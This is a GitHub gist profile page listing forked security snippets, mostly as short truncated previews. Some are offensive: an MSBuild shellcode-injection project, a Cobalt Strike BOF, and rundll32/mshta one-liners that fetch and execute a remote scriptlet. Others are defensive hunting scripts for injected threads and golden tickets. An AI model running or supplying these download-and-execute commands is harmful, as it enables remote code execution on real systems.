bigbrobro
bigbrobro
/ Visualizing Cyber Attacks with Suricata and Zeek using Brim and NetworkX.ipynb
Created
February 26, 2021 01:52
— forked from orochford/Visualizing Cyber Attacks with Suricata and Zeek using Brim and NetworkX.ipynb
Visualizing Cyber Attacks with Suricata and Zeek using Brim and NetworkX
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
bigbrobro
/ Zeek, Suricata Brim and NetworkX (2).ipynb
Created
February 26, 2021 01:51
— forked from orochford/Zeek, Suricata Brim and NetworkX (2).ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
bigbrobro
/ msbuildQueueAPC.csproj
Created
January 20, 2021 06:17
— forked from vector-sec/msbuildQueueAPC.csproj
MSBuild => CSC.exe Shellcode Inject using QueueUserAPC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <-- x86 --> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj --> | |
| <!- x64 --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask |
bigbrobro
/ EnumCLR.c
Created
January 6, 2021 06:03
— forked from G0ldenGunSec/EnumCLR.c
Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <string.h> | |
| #include <stdio.h> | |
| #include <windows.h> | |
| #include <psapi.h> | |
| #include "beacon.h" | |
| DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD); | |
| DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD); | |
| DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD); |
bigbrobro
/ instructions.txt
Created
December 31, 2020 02:07
— forked from NickTyrer/instructions.txt
xwizard_sct
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} | |
| verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC} | |
| create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC} | |
| rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close(); | |
| mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close(); |
bigbrobro
/ Get-InjectedThread.ps1
Created
December 30, 2020 02:25
— forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-InjectedThread | |
| { | |
| <# | |
| .SYNOPSIS | |
| Looks for threads that were created as a result of code injection. | |
| .DESCRIPTION | |
bigbrobro
/ Get-AccessToken.ps1
Created
December 30, 2020 02:25
— forked from jaredcatkinson/Get-AccessToken.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-AccessToken | |
| { | |
| param | |
| ( | |
| [Parameter()] | |
| [System.Diagnostics.Process[]] | |
| $Process | |
| ) | |
| begin |
bigbrobro
/ Get-KerberosTicketGrantingTicket.ps1
Created
December 30, 2020 02:25
— forked from jaredcatkinson/Get-KerberosTicketGrantingTicket.ps1
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-KerberosTicketGrantingTicket | |
| { | |
| <# | |
| .SYNOPSIS | |
| Gets the Kerberos Tickets Granting Tickets from all Logon Sessions | |
| .DESCRIPTION | |
| Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets. |
bigbrobro
/ estigmergio.py
Created
December 30, 2020 02:23
— forked from X-C3LL/estigmergio.py
Infer prefixes/suffixes/common substrings inside a list of subdomains and build a dictionary
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from difflib import SequenceMatcher | |
| import sys | |
| def words(words_file): | |
| try: | |
| with open(words_file, "r") as file: |
bigbrobro
/ estigmergio.py
Created
December 30, 2020 02:23
— forked from X-C3LL/estigmergio.py
Infer prefixes/suffixes/common substrings inside a list of subdomains and build a dictionary
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from difflib import SequenceMatcher | |
| import sys | |
| def words(words_file): | |
| try: | |
| with open(words_file, "r") as file: |